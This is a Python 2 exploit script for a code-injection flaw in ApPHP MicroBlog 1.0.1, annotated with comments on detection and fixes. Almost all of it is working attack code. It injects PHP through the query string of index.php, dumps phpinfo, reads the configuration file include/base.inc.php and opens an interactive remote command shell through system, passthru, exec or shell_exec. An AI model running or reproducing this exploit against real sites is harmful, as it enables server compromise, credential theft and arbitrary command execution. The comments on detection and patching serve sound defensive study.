#!/usr/bin/python
# Python 2 script (print statements, raw_input, urllib.urlopen); it does not run
# unmodified on Python 3.
import random
import hashlib
import urllib
from base64 import b64encode as b64
import sys
import re

# Exploit Title: Python exploit for ApPHP MicroBlog 1.0.1 (Free Version) - RCE
# Exploit Author: LOTFREE
# Version: ApPHP MicroBlog 1.0.1 (Free Version)
# EDB-ID: 33030
#
# Archived public proof-of-concept. What it demonstrates: a value placed directly
# in the query string of index.php is reflected back as the output of PHP calls
# (echo/base64_decode/phpinfo/readfile/system ...), which is only possible if the
# request data reaches a PHP code-evaluation context unescaped. From a defender's
# view the request shapes built below (CHECK_FMT, INFO_FMT, CONFIG_FMT, EXEC_FMT)
# are the detection signal: a query string to index.php containing
# `);echo(base64_decode(` followed by `phpinfo()`, `readfile(` or a shell function
# name is not a legitimate parameter=value request. The fix on the application
# side is to stop interpolating request input into evaluated code (and to keep the
# software patched); a WAF/log rule keyed on the pattern above catches this PoC
# and its trivial variants.

print "-= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"
print "original exploit by Jiko : http://www.exploit-db.com/exploits/33030/"

if len(sys.argv) < 2:
    print "Usage: python {0} http://target/blog/index.php".format(sys.argv[0])
    sys.exit()

# When True, every request URL is printed before it is sent.
debug = False

# Request templates. {0} is the index.php URL, {1} a random single letter used as
# the parameter name, and the remaining fields are base64-encoded strings the
# server decodes and echoes. Each template closes an open call with `)` and ends
# with `=/`, i.e. the injected text is meant to be spliced into existing PHP code
# (the exact server-side context is not visible from this script).
CHECK_FMT = "{0}?{1});echo(base64_decode('{2}')=/"
INFO_FMT = "{0}?{1});echo(base64_decode('{2}'));phpinfo();echo(base64_decode('{3}')=/"
# to read include/base.inc.php
# 'aW5jbHVkZS9iYXNlLmluYy5waHA%3D' is the base64 of that path; %3D is the
# URL-encoded trailing '=' of the base64 string.
CONFIG_FMT = "{0}?{1});echo(base64_decode('{2}'));readfile(base64_decode('aW5jbHVkZS9iYXNlLmluYy5waHA%3D'));echo(base64_decode('{3}')=/"
# {3} is the name of the PHP function to call, {4} its base64-encoded argument.
EXEC_FMT = "{0}?{1});echo(base64_decode('{2}'));{3}(base64_decode('{4}'));echo(base64_decode('{5}')=/"

index_url = sys.argv[1]
# Random lowercase letter (a-z) used as the query parameter name.
char = chr(random.randint(97,122))
# start_mark/end_mark are 15-hex-character random markers that the server is asked
# to echo around the interesting output; extract_between() cuts the output out of
# the surrounding HTML using them. md5 is used here only to derive a marker string,
# not for any security property.
start_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
end_mark = hashlib.md5(str(random.random())).hexdigest()[:15]

print "[*] Testing for vulnerability..."
# Vulnerability check: send a fresh random marker and look for it, decoded, in
# the response body. A plain reflection of the encoded value would not match.
random_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
url = CHECK_FMT.format(index_url, char, b64(random_mark))
if debug:
    print url
# NOTE: urlopen responses are never closed anywhere in this script.
r = urllib.urlopen(url)
if not random_mark in r.read():
    print "[-] Website is not vulnerable :'("
    sys.exit()
print "[+] Website is vulnerable"
print

def extract_between(data):
    """Return the text between start_mark and end_mark in data.

    Returns "" (after printing an error) when either marker is missing.
    Only the first occurrence of each marker is considered.
    """
    global start_mark
    global end_mark
    if start_mark not in data or end_mark not in data:
        print "[-] Oops. Something went wrong :("
        return ""
    return data.split(start_mark, 1)[1].split(end_mark, 1)[0]

print "[*] Fecthing phpinfo"
url = INFO_FMT.format(index_url, char, b64(start_mark), b64(end_mark))
if debug:
    print url
r = urllib.urlopen(url)
output = extract_between(r.read())
# Crude tag stripping: replace every HTML tag with a space so phpinfo()'s table
# rows become plain lines of "Name Value".
output = re.compile(r'<[^<]*?/?>').sub(' ', output)
# Only lines starting with one of these phpinfo() labels are printed.
interesting_values = [ "PHP Version", "System", "Loaded Configuration File", "Apache Version", "Server Root", "DOCUMENT_ROOT", "allow_url_", "disable_functions", "open_basedir", "safe_mode", "User/Group"]
for line in output.split("\n"):
    line = line.strip()
    if line:
        for value in interesting_values:
            if line.startswith(value):
                print "\t" + line
print

print "[*] Fetching include/base.inc.php"
url = CONFIG_FMT.format(index_url, char, b64(start_mark), b64(end_mark))
if debug:
    print url
r = urllib.urlopen(url)
output = extract_between(r.read())
print output
print

# Candidate PHP functions, tried in order; the first one whose output contains
# the expected echo result is kept.
exec_functions = ["system", "passthru", "exec", "shell_exec"]
valid_exec = None
print "[*] Testing remote execution"
for func in exec_functions:
    # trying to exec "echo LOTFREE"
    # "ZWNobyBMT1RGUkVF" is the base64 of that command (see the comment above).
    url = EXEC_FMT.format(index_url, char, b64(start_mark), func, "ZWNobyBMT1RGUkVF", b64(end_mark))
    if debug:
        print url
    r = urllib.urlopen(url)
    output = extract_between(r.read())
    if "LOTFREE" in output:
        valid_exec = func
        break

if valid_exec is None:
    print "[-] Did not manage to execute commands :("
    sys.exit()

print "[+] Remote exec is working with {0}() :)".format(valid_exec)
print "Submit your commands, type exit to quit"
# Interactive loop; ends on "exit" or EOF.
while True:
    try:
        cmd = raw_input("> ").strip()
    except EOFError:
        print
        break
    if cmd == "exit":
        print
        break
    # Pad the command with spaces to a multiple of 3 bytes so its base64 form has
    # no trailing '=' characters; presumably because the URL is sent without
    # percent-encoding and a bare '=' would break the injected text.
    if (len(cmd) % 3) > 0:
        padding = " " * (3 - len(cmd) % 3)
        cmd = cmd + padding
    # Uses the loop variable `func` rather than `valid_exec`; they are equal here
    # because the search loop above exited via break.
    url = EXEC_FMT.format(index_url, char, b64(start_mark), func, b64(cmd), b64(end_mark))
    if debug:
        print url
    r = urllib.urlopen(url)
    output = extract_between(r.read())
    print output
print